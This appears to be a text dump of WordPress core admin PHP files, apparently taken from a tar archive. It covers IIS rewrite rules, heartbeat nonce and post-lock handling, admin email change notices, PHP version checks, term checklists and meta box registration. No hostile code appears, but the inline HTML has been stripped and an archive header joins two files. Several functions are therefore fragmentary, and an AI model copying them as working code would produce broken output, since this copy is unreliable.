iis7_add_rewrite_rule( $filename, $rewrite_rule ) { if ( ! class_exists( 'DOMDocument', false ) ) { return false; } // If configuration file does not exist then we create one. if ( ! file_exists( $filename ) ) { $fp = fopen( $filename, 'w' ); fwrite( $fp, '' ); fclose( $fp ); } $doc = new DOMDocument(); $doc->preserveWhiteSpace = false; if ( $doc->load( $filename ) === false ) { return false; } $xpath = new DOMXPath( $doc ); // First check if the rule already exists as in that case there is no need to re-add it. $wordpress_rules = $xpath->query( '/configuration/system.webServer/rewrite/rules/rule[starts-with(@name,\'wordpress\')] | /configuration/system.webServer/rewrite/rules/rule[starts-with(@name,\'WordPress\')]' ); if ( $wordpress_rules->length > 0 ) { return true; } // Check the XPath to the rewrite rule and create XML nodes if they do not exist. $xml_nodes = $xpath->query( '/configuration/system.webServer/rewrite/rules' ); if ( $xml_nodes->length > 0 ) { $rules_node = $xml_nodes->item( 0 ); } else { $rules_node = $doc->createElement( 'rules' ); $xml_nodes = $xpath->query( '/configuration/system.webServer/rewrite' ); if ( $xml_nodes->length > 0 ) { $rewrite_node = $xml_nodes->item( 0 ); $rewrite_node->appendChild( $rules_node ); } else { $rewrite_node = $doc->createElement( 'rewrite' ); $rewrite_node->appendChild( $rules_node ); $xml_nodes = $xpath->query( '/configuration/system.webServer' ); if ( $xml_nodes->length > 0 ) { $system_web_server_node = $xml_nodes->item( 0 ); $system_web_server_node->appendChild( $rewrite_node ); } else { $system_web_server_node = $doc->createElement( 'system.webServer' ); $system_web_server_node->appendChild( $rewrite_node ); $xml_nodes = $xpath->query( '/configuration' ); if ( $xml_nodes->length > 0 ) { $config_node = $xml_nodes->item( 0 ); $config_node->appendChild( $system_web_server_node ); } else { $config_node = $doc->createElement( 'configuration' ); $doc->appendChild( $config_node ); $config_node->appendChild( $system_web_server_node ); } } } } $rule_fragment = $doc->createDocumentFragment(); $rule_fragment->appendXML( $rewrite_rule ); $rules_node->appendChild( $rule_fragment ); $doc->encoding = 'UTF-8'; $doc->formatOutput = true; saveDomDocument( $doc, $filename ); return true; } /** * Saves the XML document into a file. * * @since 2.8.0 * * @param DOMDocument $doc * @param string $filename */ function saveDomDocument( $doc, $filename ) { // phpcs:ignore WordPress.NamingConventions.ValidFunctionName.FunctionNameInvalid $config = $doc->saveXML(); $config = preg_replace( "/([^\r])\n/", "$1\r\n", $config ); $fp = fopen( $filename, 'w' ); fwrite( $fp, $config ); fclose( $fp ); } /** * Displays the default administration color scheme picker (Used in user-edit.php). * * @since 3.0.0 * * @global array $_wp_admin_css_colors * * @param int $user_id User ID. */ function admin_color_scheme_picker( $user_id ) { global $_wp_admin_css_colors; ksort( $_wp_admin_css_colors ); if ( isset( $_wp_admin_css_colors['fresh'] ) ) { // Set Default ('fresh') and Light should go first. $_wp_admin_css_colors = array_filter( array_merge( array( 'fresh' => '', 'light' => '', 'modern' => '', ), $_wp_admin_css_colors ) ); } $current_color = get_user_option( 'admin_color', $user_id ); if ( empty( $current_color ) || ! isset( $_wp_admin_css_colors[ $current_color ] ) ) { $current_color = 'fresh'; } ?>
    $color_info ) : ?>
    />
    colors as $html_color ) { ?>
     
    icon_colors ) ) { $icon_colors = $_wp_admin_css_colors[ $color_scheme ]->icon_colors; } elseif ( ! empty( $_wp_admin_css_colors['fresh']->icon_colors ) ) { $icon_colors = $_wp_admin_css_colors['fresh']->icon_colors; } else { // Fall back to the default set of icon colors if the default scheme is missing. $icon_colors = array( 'base' => '#a7aaad', 'focus' => '#72aee6', 'current' => '#fff', ); } echo '\n"; } /** * Displays the viewport meta in the admin. * * @since 5.5.0 */ function wp_admin_viewport_meta() { /** * Filters the viewport meta in the admin. * * @since 5.5.0 * * @param string $viewport_meta The viewport meta. */ $viewport_meta = apply_filters( 'admin_viewport_meta', 'width=device-width,initial-scale=1.0' ); if ( empty( $viewport_meta ) ) { return; } echo ''; } /** * Adds viewport meta for mobile in Customizer. * * Hooked to the {@see 'admin_viewport_meta'} filter. * * @since 5.5.0 * * @param string $viewport_meta The viewport meta. * @return string Filtered viewport meta. */ function _customizer_mobile_viewport_meta( $viewport_meta ) { return trim( $viewport_meta, ',' ) . ',minimum-scale=0.5,maximum-scale=1.2'; } /** * Checks lock status for posts displayed on the Posts screen. * * @since 3.6.0 * * @param array $response The Heartbeat response. * @param array $data The $_POST data sent. * @param string $screen_id The screen ID. * @return array The Heartbeat response. */ function wp_check_locked_posts( $response, $data, $screen_id ) { $checked = array(); if ( array_key_exists( 'wp-check-locked-posts', $data ) && is_array( $data['wp-check-locked-posts'] ) ) { foreach ( $data['wp-check-locked-posts'] as $key ) { $post_id = absint( substr( $key, 5 ) ); if ( ! $post_id ) { continue; } $user_id = wp_check_post_lock( $post_id ); if ( $user_id ) { $user = get_userdata( $user_id ); if ( $user && current_user_can( 'edit_post', $post_id ) ) { $send = array( 'name' => $user->display_name, /* translators: %s: User's display name. */ 'text' => sprintf( __( '%s is currently editing' ), $user->display_name ), ); if ( get_option( 'show_avatars' ) ) { $send['avatar_src'] = get_avatar_url( $user->ID, array( 'size' => 18 ) ); $send['avatar_src_2x'] = get_avatar_url( $user->ID, array( 'size' => 36 ) ); } $checked[ $key ] = $send; } } } } if ( ! empty( $checked ) ) { $response['wp-check-locked-posts'] = $checked; } return $response; } /** * Checks lock status on the New/Edit Post screen and refresh the lock. * * @since 3.6.0 * * @param array $response The Heartbeat response. * @param array $data The $_POST data sent. * @param string $screen_id The screen ID. * @return array The Heartbeat response. */ function wp_refresh_post_lock( $response, $data, $screen_id ) { if ( array_key_exists( 'wp-refresh-post-lock', $data ) ) { $received = $data['wp-refresh-post-lock']; $send = array(); $post_id = absint( $received['post_id'] ); if ( ! $post_id ) { return $response; } if ( ! current_user_can( 'edit_post', $post_id ) ) { return $response; } $user_id = wp_check_post_lock( $post_id ); $user = get_userdata( $user_id ); if ( $user ) { $error = array( 'name' => $user->display_name, /* translators: %s: User's display name. */ 'text' => sprintf( __( '%s has taken over and is currently editing.' ), $user->display_name ), ); if ( get_option( 'show_avatars' ) ) { $error['avatar_src'] = get_avatar_url( $user->ID, array( 'size' => 64 ) ); $error['avatar_src_2x'] = get_avatar_url( $user->ID, array( 'size' => 128 ) ); } $send['lock_error'] = $error; } else { $new_lock = wp_set_post_lock( $post_id ); if ( $new_lock ) { $send['new_lock'] = implode( ':', $new_lock ); } } $response['wp-refresh-post-lock'] = $send; } return $response; } /** * Checks nonce expiration on the New/Edit Post screen and refresh if needed. * * @since 3.6.0 * * @param array $response The Heartbeat response. * @param array $data The $_POST data sent. * @param string $screen_id The screen ID. * @return array The Heartbeat response. */ function wp_refresh_post_nonces( $response, $data, $screen_id ) { if ( array_key_exists( 'wp-refresh-post-nonces', $data ) ) { $received = $data['wp-refresh-post-nonces']; $response['wp-refresh-post-nonces'] = array( 'check' => 1 ); $post_id = absint( $received['post_id'] ); if ( ! $post_id ) { return $response; } if ( ! current_user_can( 'edit_post', $post_id ) ) { return $response; } $response['wp-refresh-post-nonces'] = array( 'replace' => array( 'getpermalinknonce' => wp_create_nonce( 'getpermalink' ), 'samplepermalinknonce' => wp_create_nonce( 'samplepermalink' ), 'closedpostboxesnonce' => wp_create_nonce( 'closedpostboxes' ), '_ajax_linking_nonce' => wp_create_nonce( 'internal-linking' ), '_wpnonce' => wp_create_nonce( 'update-post_' . $post_id ), ), ); } return $response; } /** * Refresh nonces used with meta boxes in the block editor. * * @since 6.1.0 * * @param array $response The Heartbeat response. * @param array $data The $_POST data sent. * @return array The Heartbeat response. */ function wp_refresh_metabox_loader_nonces( $response, $data ) { if ( empty( $data['wp-refresh-metabox-loader-nonces'] ) ) { return $response; } $received = $data['wp-refresh-metabox-loader-nonces']; $post_id = (int) $received['post_id']; if ( ! $post_id ) { return $response; } if ( ! current_user_can( 'edit_post', $post_id ) ) { return $response; } $response['wp-refresh-metabox-loader-nonces'] = array( 'replace' => array( 'metabox_loader_nonce' => wp_create_nonce( 'meta-box-loader' ), '_wpnonce' => wp_create_nonce( 'update-post_' . $post_id ), ), ); return $response; } /** * Adds the latest Heartbeat and REST API nonce to the Heartbeat response. * * @since 5.0.0 * * @param array $response The Heartbeat response. * @return array The Heartbeat response. */ function wp_refresh_heartbeat_nonces( $response ) { // Refresh the Rest API nonce. $response['rest_nonce'] = wp_create_nonce( 'wp_rest' ); // Refresh the Heartbeat nonce. $response['heartbeat_nonce'] = wp_create_nonce( 'heartbeat-nonce' ); return $response; } /** * Disables suspension of Heartbeat on the Add/Edit Post screens. * * @since 3.8.0 * * @global string $pagenow The filename of the current screen. * * @param array $settings An array of Heartbeat settings. * @return array Filtered Heartbeat settings. */ function wp_heartbeat_set_suspension( $settings ) { global $pagenow; if ( 'post.php' === $pagenow || 'post-new.php' === $pagenow ) { $settings['suspension'] = 'disable'; } return $settings; } /** * Performs autosave with heartbeat. * * @since 3.9.0 * * @param array $response The Heartbeat response. * @param array $data The $_POST data sent. * @return array The Heartbeat response. */ function heartbeat_autosave( $response, $data ) { if ( ! empty( $data['wp_autosave'] ) ) { $saved = wp_autosave( $data['wp_autosave'] ); if ( is_wp_error( $saved ) ) { $response['wp_autosave'] = array( 'success' => false, 'message' => $saved->get_error_message(), ); } elseif ( empty( $saved ) ) { $response['wp_autosave'] = array( 'success' => false, 'message' => __( 'Error while saving.' ), ); } else { /* translators: Draft saved date format, see https://www.php.net/manual/datetime.format.php */ $draft_saved_date_format = __( 'g:i:s a' ); $response['wp_autosave'] = array( 'success' => true, /* translators: %s: Date and time. */ 'message' => sprintf( __( 'Draft saved at %s.' ), date_i18n( $draft_saved_date_format ) ), ); } } return $response; } /** * Removes single-use URL parameters and create canonical link based on new URL. * * Removes specific query string parameters from a URL, create the canonical link, * put it in the admin header, and change the current URL to match. * * @since 4.2.0 */ function wp_admin_canonical_url() { $removable_query_args = wp_removable_query_args(); if ( empty( $removable_query_args ) ) { return; } // Ensure we're using an absolute URL. $current_url = set_url_scheme( 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'] ); $filtered_url = remove_query_arg( $removable_query_args, $current_url ); /** * Filters the admin canonical URL value. * * @since 6.5.0 * * @param string $filtered_url The admin canonical URL value. */ $filtered_url = apply_filters( 'wp_admin_canonical_url', $filtered_url ); ?> $hash, 'newemail' => $value, ); update_option( 'adminhash', $new_admin_email, false ); $switched_locale = switch_to_user_locale( get_current_user_id() ); /* translators: Do not translate USERNAME, ADMIN_URL, EMAIL, SITENAME, SITEURL: those are placeholders. */ $email_text = __( 'Howdy, A site administrator (###USERNAME###) recently requested to have the administration email address changed on this site: ###SITEURL### To confirm this change, please click on the following link: ###ADMIN_URL### You can safely ignore and delete this email if you do not want to take this action. This email has been sent to ###EMAIL### Regards, All at ###SITENAME### ###SITEURL###' ); /** * Filters the text of the email sent when a change of site admin email address is attempted. * * The following strings have a special meaning and will get replaced dynamically: * * - `###USERNAME###` The current user's username. * - `###ADMIN_URL###` The link to click on to confirm the email change. * - `###EMAIL###` The proposed new site admin email address. * - `###SITENAME###` The name of the site. * - `###SITEURL###` The URL to the site. * * @since MU (3.0.0) * @since 4.9.0 This filter is no longer Multisite specific. * * @param string $email_text Text in the email. * @param array $new_admin_email { * Data relating to the new site admin email address. * * @type string $hash The secure hash used in the confirmation link URL. * @type string $newemail The proposed new site admin email address. * } */ $content = apply_filters( 'new_admin_email_content', $email_text, $new_admin_email ); $current_user = wp_get_current_user(); $content = str_replace( '###USERNAME###', $current_user->user_login, $content ); $content = str_replace( '###ADMIN_URL###', esc_url( self_admin_url( 'options.php?adminhash=' . $hash ) ), $content ); $content = str_replace( '###EMAIL###', $value, $content ); $content = str_replace( '###SITENAME###', wp_specialchars_decode( get_option( 'blogname' ), ENT_QUOTES ), $content ); $content = str_replace( '###SITEURL###', home_url(), $content ); if ( '' !== get_option( 'blogname' ) ) { $site_title = wp_specialchars_decode( get_option( 'blogname' ), ENT_QUOTES ); } else { $site_title = parse_url( home_url(), PHP_URL_HOST ); } $subject = sprintf( /* translators: New admin email address notification email subject. %s: Site title. */ __( '[%s] New Admin Email Address' ), $site_title ); /** * Filters the subject of the email sent when a change of site admin email address is attempted. * * @since 6.5.0 * * @param string $subject Subject of the email. */ $subject = apply_filters( 'new_admin_email_subject', $subject ); wp_mail( $value, $subject, $content ); if ( $switched_locale ) { restore_previous_locale(); } } /** * Appends '(Draft)' to draft page titles in the privacy page dropdown * so that unpublished content is obvious. * * @since 4.9.8 * @access private * * @param string $title Page title. * @param WP_Post $page Page data object. * @return string Page title. */ function _wp_privacy_settings_filter_draft_page_titles( $title, $page ) { if ( 'draft' === $page->post_status && 'privacy' === get_current_screen()->id ) { /* translators: %s: Page title. */ $title = sprintf( __( '%s (Draft)' ), $title ); } return $title; } /** * Checks if the user needs to update PHP. * * @since 5.1.0 * @since 5.1.1 Added the {@see 'wp_is_php_version_acceptable'} filter. * * @return array|false { * Array of PHP version data. False on failure. * * @type string $recommended_version The PHP version recommended by WordPress. * @type string $minimum_version The minimum required PHP version. * @type bool $is_supported Whether the PHP version is actively supported. * @type bool $is_secure Whether the PHP version receives security updates. * @type bool $is_acceptable Whether the PHP version is still acceptable or warnings * should be shown and an update recommended. * } */ function wp_check_php_version() { $version = PHP_VERSION; $key = md5( $version ); $response = get_site_transient( 'php_check_' . $key ); if ( false === $response ) { $url = 'http://api.wordpress.org/core/serve-happy/1.0/'; if ( wp_http_supports( array( 'ssl' ) ) ) { $url = set_url_scheme( $url, 'https' ); } $url = add_query_arg( 'php_version', $version, $url ); $response = wp_remote_get( $url ); if ( is_wp_error( $response ) || 200 !== wp_remote_retrieve_response_code( $response ) ) { return false; } $response = json_decode( wp_remote_retrieve_body( $response ), true ); if ( ! is_array( $response ) ) { return false; } set_site_transient( 'php_check_' . $key, $response, WEEK_IN_SECONDS ); } if ( isset( $response['is_acceptable'] ) && $response['is_acceptable'] ) { /** * Filters whether the active PHP version is considered acceptable by WordPress. * * Returning false will trigger a PHP version warning to show up in the admin dashboard to administrators. * * This filter is only run if the wordpress.org Serve Happy API considers the PHP version acceptable, ensuring * that this filter can only make this check stricter, but not loosen it. * * @since 5.1.1 * * @param bool $is_acceptable Whether the PHP version is considered acceptable. Default true. * @param string $version PHP version checked. */ $response['is_acceptable'] = (bool) apply_filters( 'wp_is_php_version_acceptable', true, $version ); } $response['is_lower_than_future_minimum'] = false; // The minimum supported PHP version will be updated to 7.4 in the future. Check if the current version is lower. if ( version_compare( $version, '7.4', '<' ) ) { $response['is_lower_than_future_minimum'] = true; // Force showing of warnings. $response['is_acceptable'] = false; } return $response; } includes/template.php000064400000301727152075237570010725 0ustar00 'category', 'descendants_and_self' => $descendants_and_self, 'selected_cats' => $selected_cats, 'popular_cats' => $popular_cats, 'walker' => $walker, 'checked_ontop' => $checked_ontop, ) ); } /** * Outputs an unordered list of checkbox input elements labelled with term names. * * Taxonomy-independent version of wp_category_checklist(). * * @since 3.0.0 * @since 4.4.0 Introduced the `$echo` argument. * * @param int $post_id Optional. Post ID. Default 0. * @param array|string $args { * Optional. Array or string of arguments for generating a terms checklist. Default empty array. * * @type int $descendants_and_self ID of the category to output along with its descendants. * Default 0. * @type int[] $selected_cats Array of category IDs to mark as checked. Default false. * @type int[] $popular_cats Array of category IDs to receive the "popular-category" class. * Default false. * @type Walker $walker Walker object to use to build the output. Default empty which * results in a Walker_Category_Checklist instance being used. * @type string $taxonomy Taxonomy to generate the checklist for. Default 'category'. * @type bool $checked_ontop Whether to move checked items out of the hierarchy and to * the top of the list. Default true. * @type bool $echo Whether to echo the generated markup. False to return the markup instead * of echoing it. Default true. * } * @return string HTML list of input elements. */ function wp_terms_checklist( $post_id = 0, $args = array() ) { $defaults = array( 'descendants_and_self' => 0, 'selected_cats' => false, 'popular_cats' => false, 'walker' => null, 'taxonomy' => 'category', 'checked_ontop' => true, 'echo' => true, ); /** * Filters the taxonomy terms checklist arguments. * * @since 3.4.0 * * @see wp_terms_checklist() * * @param array|string $args An array or string of arguments. * @param int $post_id The post ID. */ $params = apply_filters( 'wp_terms_checklist_args', $args, $post_id ); $parsed_args = wp_parse_args( $params, $defaults ); if ( empty( $parsed_args['walker'] ) || ! ( $parsed_args['walker'] instanceof Walker ) ) { $walker = new Walker_Category_Checklist(); } else { $walker = $parsed_args['walker']; } $taxonomy = $parsed_args['taxonomy']; $descendants_and_self = (int) $parsed_args['descendants_and_self']; $args = array( 'taxonomy' => $taxonomy ); $tax = get_taxonomy( $taxonomy ); $args['disabled'] = ! current_user_can( $tax->cap->assign_terms ); $args['list_only'] = ! empty( $parsed_args['list_only'] ); if ( is_array( $parsed_args['selected_cats'] ) ) { $args['selected_cats'] = array_map( 'intval', $parsed_args['selected_cats'] ); } elseif ( $post_id ) { $args['selected_cats'] = wp_get_object_terms( $post_id, $taxonomy, array_merge( $args, array( 'fields' => 'ids' ) ) ); } else { $args['selected_cats'] = array(); } if ( is_array( $parsed_args['popular_cats'] ) ) { $args['popular_cats'] = array_map( 'intval', $parsed_args['popular_cats'] ); } else { $args['popular_cats'] = get_terms( array( 'taxonomy' => $taxonomy, 'fields' => 'ids', 'orderby' => 'count', 'order' => 'DESC', 'number' => 10, 'hierarchical' => false, ) ); } if ( $descendants_and_self ) { $categories = (array) get_terms( array( 'taxonomy' => $taxonomy, 'child_of' => $descendants_and_self, 'hierarchical' => 0, 'hide_empty' => 0, ) ); $self = get_term( $descendants_and_self, $taxonomy ); array_unshift( $categories, $self ); } else { $categories = (array) get_terms( array( 'taxonomy' => $taxonomy, 'get' => 'all', ) ); } $output = ''; if ( $parsed_args['checked_ontop'] ) { /* * Post-process $categories rather than adding an exclude to the get_terms() query * to keep the query the same across all posts (for any query cache). */ $checked_categories = array(); $keys = array_keys( $categories ); foreach ( $keys as $k ) { if ( in_array( $categories[ $k ]->term_id, $args['selected_cats'], true ) ) { $checked_categories[] = $categories[ $k ]; unset( $categories[ $k ] ); } } // Put checked categories on top. $output .= $walker->walk( $checked_categories, 0, $args ); } // Then the rest of them. $output .= $walker->walk( $categories, 0, $args ); if ( $parsed_args['echo'] ) { echo $output; } return $output; } /** * Retrieves a list of the most popular terms from the specified taxonomy. * * If the `$display` argument is true then the elements for a list of checkbox * `` elements labelled with the names of the selected terms is output. * If the `$post_ID` global is not empty then the terms associated with that * post will be marked as checked. * * @since 2.5.0 * * @param string $taxonomy Taxonomy to retrieve terms from. * @param int $default_term Optional. Not used. * @param int $number Optional. Number of terms to retrieve. Default 10. * @param bool $display Optional. Whether to display the list as well. Default true. * @return int[] Array of popular term IDs. */ function wp_popular_terms_checklist( $taxonomy, $default_term = 0, $number = 10, $display = true ) { $post = get_post(); if ( $post && $post->ID ) { $checked_terms = wp_get_object_terms( $post->ID, $taxonomy, array( 'fields' => 'ids' ) ); } else { $checked_terms = array(); } $terms = get_terms( array( 'taxonomy' => $taxonomy, 'orderby' => 'count', 'order' => 'DESC', 'number' => $number, 'hierarchical' => false, ) ); $tax = get_taxonomy( $taxonomy ); $popular_ids = array(); foreach ( (array) $terms as $term ) { $popular_ids[] = $term->term_id; if ( ! $display ) { // Hack for Ajax use. continue; } $id = "popular-$taxonomy-$term->term_id"; $checked = in_array( $term->term_id, $checked_terms, true ) ? 'checked="checked"' : ''; ?> 'link_category', 'orderby' => 'name', 'hide_empty' => 0, ) ); if ( empty( $categories ) ) { return; } foreach ( $categories as $category ) { $cat_id = $category->term_id; /** This filter is documented in wp-includes/category-template.php */ $name = esc_html( apply_filters( 'the_category', $category->name, '', '' ) ); $checked = in_array( $cat_id, $checked_categories, true ) ? ' checked="checked"' : ''; echo ''; } } /** * Adds hidden fields with the data for use in the inline editor for posts and pages. * * @since 2.7.0 * * @param WP_Post $post Post object. */ function get_inline_data( $post ) { $post_type_object = get_post_type_object( $post->post_type ); if ( ! current_user_can( 'edit_post', $post->ID ) ) { return; } $title = esc_textarea( trim( $post->post_title ) ); echo ' '; } /** * Outputs the in-line comment reply-to form in the Comments list table. * * @since 2.7.0 * * @global WP_List_Table $wp_list_table * * @param int $position Optional. The value of the 'position' input field. Default 1. * @param bool $checkbox Optional. The value of the 'checkbox' input field. Default false. * @param string $mode Optional. If set to 'single', will use WP_Post_Comments_List_Table, * otherwise WP_Comments_List_Table. Default 'single'. * @param bool $table_row Optional. Whether to use a table instead of a div element. Default true. */ function wp_comment_reply( $position = 1, $checkbox = false, $mode = 'single', $table_row = true ) { global $wp_list_table; /** * Filters the in-line comment reply-to form output in the Comments * list table. * * Returning a non-empty value here will short-circuit display * of the in-line comment-reply form in the Comments list table, * echoing the returned value instead. * * @since 2.7.0 * * @see wp_comment_reply() * * @param string $content The reply-to form content. * @param array $args An array of default args. */ $content = apply_filters( 'wp_comment_reply', '', array( 'position' => $position, 'checkbox' => $checkbox, 'mode' => $mode, ) ); if ( ! empty( $content ) ) { echo $content; return; } if ( ! $wp_list_table ) { if ( 'single' === $mode ) { $wp_list_table = _get_list_table( 'WP_Post_Comments_List_Table' ); } else { $wp_list_table = _get_list_table( 'WP_Comments_List_Table' ); } } ?>
    ' . _x( 'Name', 'meta name' ) . ' ' . __( 'Value' ) . ' '; // TBODY needed for list-manipulation JS. return; } $count = 0; ?>
    . $entry['meta_id'] = (int) $entry['meta_id']; $delete_nonce = wp_create_nonce( 'delete-meta_' . $entry['meta_id'] ); $r .= "\n\t"; $r .= "\n\t\t"; $r .= "\n\t\t
    "; $r .= get_submit_button( __( 'Delete' ), 'deletemeta small', "deletemeta[{$entry['meta_id']}]", false, array( 'data-wp-lists' => "delete:the-list:meta-{$entry['meta_id']}::_ajax_nonce=$delete_nonce" ) ); $r .= "\n\t\t"; $r .= get_submit_button( __( 'Update' ), 'updatemeta small', "meta-{$entry['meta_id']}-submit", false, array( 'data-wp-lists' => "add:the-list:meta-{$entry['meta_id']}::_ajax_nonce-add-meta=$update_nonce" ) ); $r .= '
    '; $r .= wp_nonce_field( 'change-meta', '_ajax_nonce', false, false ); $r .= ''; $r .= "\n\t\t\n\t"; return $r; } /** * Prints the form in the Custom Fields meta box. * * @since 1.2.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @param WP_Post $post Optional. The post being edited. */ function meta_form( $post = null ) { global $wpdb; $post = get_post( $post ); /** * Filters values for the meta key dropdown in the Custom Fields meta box. * * Returning a non-null value will effectively short-circuit and avoid a * potentially expensive query against postmeta. * * @since 4.4.0 * * @param array|null $keys Pre-defined meta keys to be used in place of a postmeta query. Default null. * @param WP_Post $post The current post object. */ $keys = apply_filters( 'postmeta_form_keys', null, $post ); if ( null === $keys ) { /** * Filters the number of custom fields to retrieve for the drop-down * in the Custom Fields meta box. * * @since 2.1.0 * * @param int $limit Number of custom fields to retrieve. Default 30. */ $limit = apply_filters( 'postmeta_form_limit', 30 ); $keys = $wpdb->get_col( $wpdb->prepare( "SELECT DISTINCT meta_key FROM $wpdb->postmeta WHERE meta_key NOT BETWEEN '_' AND '_z' HAVING meta_key NOT LIKE %s ORDER BY meta_key LIMIT %d", $wpdb->esc_like( '_' ) . '%', $limit ) ); } if ( $keys ) { natcasesort( $keys ); } ?>

    'newmeta-submit', 'data-wp-lists' => 'add:the-list:newmeta', ) ); ?>
    post_status, array( 'draft', 'pending' ), true ) && ( ! $post->post_date_gmt || '0000-00-00 00:00:00' === $post->post_date_gmt ) ); } $tab_index_attribute = ''; if ( (int) $tab_index > 0 ) { $tab_index_attribute = " tabindex=\"$tab_index\""; } $post_date = ( $for_post ) ? $post->post_date : get_comment()->comment_date; $jj = ( $edit ) ? mysql2date( 'd', $post_date, false ) : current_time( 'd' ); $mm = ( $edit ) ? mysql2date( 'm', $post_date, false ) : current_time( 'm' ); $aa = ( $edit ) ? mysql2date( 'Y', $post_date, false ) : current_time( 'Y' ); $hh = ( $edit ) ? mysql2date( 'H', $post_date, false ) : current_time( 'H' ); $mn = ( $edit ) ? mysql2date( 'i', $post_date, false ) : current_time( 'i' ); $ss = ( $edit ) ? mysql2date( 's', $post_date, false ) : current_time( 's' ); $cur_jj = current_time( 'd' ); $cur_mm = current_time( 'm' ); $cur_aa = current_time( 'Y' ); $cur_hh = current_time( 'H' ); $cur_mn = current_time( 'i' ); $month = ''; $day = ''; $year = ''; $hour = ''; $minute = ''; echo '
    '; /* translators: 1: Month, 2: Day, 3: Year, 4: Hour, 5: Minute. */ printf( __( '%1$s %2$s, %3$s at %4$s:%5$s' ), $month, $day, $year, $hour, $minute ); echo '
    '; if ( $multi ) { return; } echo "\n\n"; $map = array( 'mm' => array( $mm, $cur_mm ), 'jj' => array( $jj, $cur_jj ), 'aa' => array( $aa, $cur_aa ), 'hh' => array( $hh, $cur_hh ), 'mn' => array( $mn, $cur_mn ), ); foreach ( $map as $timeunit => $value ) { list( $unit, $curr ) = $value; echo '' . "\n"; $cur_timeunit = 'cur_' . $timeunit; echo '' . "\n"; } ?>

    " . esc_html( $template ) . ''; } } /** * Prints out option HTML elements for the page parents drop-down. * * @since 1.5.0 * @since 4.4.0 `$post` argument was added. * * @global wpdb $wpdb WordPress database abstraction object. * * @param int $default_page Optional. The default page ID to be pre-selected. Default 0. * @param int $parent_page Optional. The parent page ID. Default 0. * @param int $level Optional. Page depth level. Default 0. * @param int|WP_Post $post Post ID or WP_Post object. * @return void|false Void on success, false if the page has no children. */ function parent_dropdown( $default_page = 0, $parent_page = 0, $level = 0, $post = null ) { global $wpdb; $post = get_post( $post ); $items = $wpdb->get_results( $wpdb->prepare( "SELECT ID, post_parent, post_title FROM $wpdb->posts WHERE post_parent = %d AND post_type = 'page' ORDER BY menu_order", $parent_page ) ); if ( $items ) { foreach ( $items as $item ) { // A page cannot be its own parent. if ( $post && $post->ID && (int) $item->ID === $post->ID ) { continue; } $pad = str_repeat( ' ', $level * 3 ); $selected = selected( $default_page, $item->ID, false ); echo "\n\t'; parent_dropdown( $default_page, $item->ID, $level + 1 ); } } else { return false; } } /** * Prints out option HTML elements for role selectors. * * @since 2.1.0 * * @param string $selected Slug for the role that should be already selected. */ function wp_dropdown_roles( $selected = '' ) { $r = ''; $editable_roles = array_reverse( get_editable_roles() ); foreach ( $editable_roles as $role => $details ) { $name = translate_user_role( $details['name'] ); // Preselect specified role. if ( $selected === $role ) { $r .= "\n\t"; } else { $r .= "\n\t"; } } echo $r; } /** * Outputs the form used by the importers to accept the data to be imported. * * @since 2.0.0 * * @param string $action The action attribute for the form. */ function wp_import_upload_form( $action ) { /** * Filters the maximum allowed upload size for import files. * * @since 2.3.0 * * @see wp_max_upload_size() * * @param int $max_upload_size Allowed upload size. Default 1 MB. */ $bytes = apply_filters( 'import_upload_size_limit', wp_max_upload_size() ); $size = size_format( $bytes ); $upload_dir = wp_upload_dir(); if ( ! empty( $upload_dir['error'] ) ) : $upload_directory_error = '

    ' . __( 'Before you can upload your import file, you will need to fix the following error:' ) . '

    '; $upload_directory_error .= '

    ' . $upload_dir['error'] . '

    '; wp_admin_notice( $upload_directory_error, array( 'additional_classes' => array( 'error' ), 'paragraph_wrap' => false, ) ); else : ?>

    %s (%s)', __( 'Choose a file from your computer:' ), /* translators: %s: Maximum allowed file size. */ sprintf( __( 'Maximum size: %s' ), $size ) ); ?>

    id ) ) { return; } $page = $screen->id; if ( ! isset( $wp_meta_boxes ) ) { $wp_meta_boxes = array(); } if ( ! isset( $wp_meta_boxes[ $page ] ) ) { $wp_meta_boxes[ $page ] = array(); } if ( ! isset( $wp_meta_boxes[ $page ][ $context ] ) ) { $wp_meta_boxes[ $page ][ $context ] = array(); } foreach ( array_keys( $wp_meta_boxes[ $page ] ) as $a_context ) { foreach ( array( 'high', 'core', 'default', 'low' ) as $a_priority ) { if ( ! isset( $wp_meta_boxes[ $page ][ $a_context ][ $a_priority ][ $id ] ) ) { continue; } // If a core box was previously removed, don't add. if ( ( 'core' === $priority || 'sorted' === $priority ) && false === $wp_meta_boxes[ $page ][ $a_context ][ $a_priority ][ $id ] ) { return; } // If a core box was previously added by a plugin, don't add. if ( 'core' === $priority ) { /* * If the box was added with default priority, give it core priority * to maintain sort order. */ if ( 'default' === $a_priority ) { $wp_meta_boxes[ $page ][ $a_context ]['core'][ $id ] = $wp_meta_boxes[ $page ][ $a_context ]['default'][ $id ]; unset( $wp_meta_boxes[ $page ][ $a_context ]['default'][ $id ] ); } return; } // If no priority given and ID already present, use existing priority. if ( empty( $priority ) ) { $priority = $a_priority; /* * Else, if we're adding to the sorted priority, we don't know the title * or callback. Grab them from the previously added context/priority. */ } elseif ( 'sorted' === $priority ) { $title = $wp_meta_boxes[ $page ][ $a_context ][ $a_priority ][ $id ]['title']; $callback = $wp_meta_boxes[ $page ][ $a_context ][ $a_priority ][ $id ]['callback']; $callback_args = $wp_meta_boxes[ $page ][ $a_context ][ $a_priority ][ $id ]['args']; } // An ID can be in only one priority and one context. if ( $priority !== $a_priority || $context !== $a_context ) { unset( $wp_meta_boxes[ $page ][ $a_context ][ $a_priority ][ $id ] ); } } } if ( empty( $priority ) ) { $priority = 'low'; } if ( ! isset( $wp_meta_boxes[ $page ][ $context ][ $priority ] ) ) { $wp_meta_boxes[ $page ][ $context ][ $priority ] = array(); } $wp_meta_boxes[ $page ][ $context ][ $priority ][ $id ] = array( 'id' => $id, 'title' => $title, 'callback' => $callback, 'args' => $callback_args, ); } /** * Renders a "fake" meta box with an information message, * shown on the block editor, when an incompatible meta box is found. * * @since 5.0.0 * * @param mixed $data_object The data object being rendered on this screen. * @param array $box { * Custom formats meta box arguments. * * @type string $id Meta box 'id' attribute. * @type string $title Meta box title. * @type callable $old_callback The original callback for this meta box. * @type array $args Extra meta box arguments. * } */ function do_block_editor_incompatible_meta_box( $data_object, $box ) { $plugin = _get_plugin_from_callback( $box['old_callback'] ); $plugins = get_plugins(); echo '

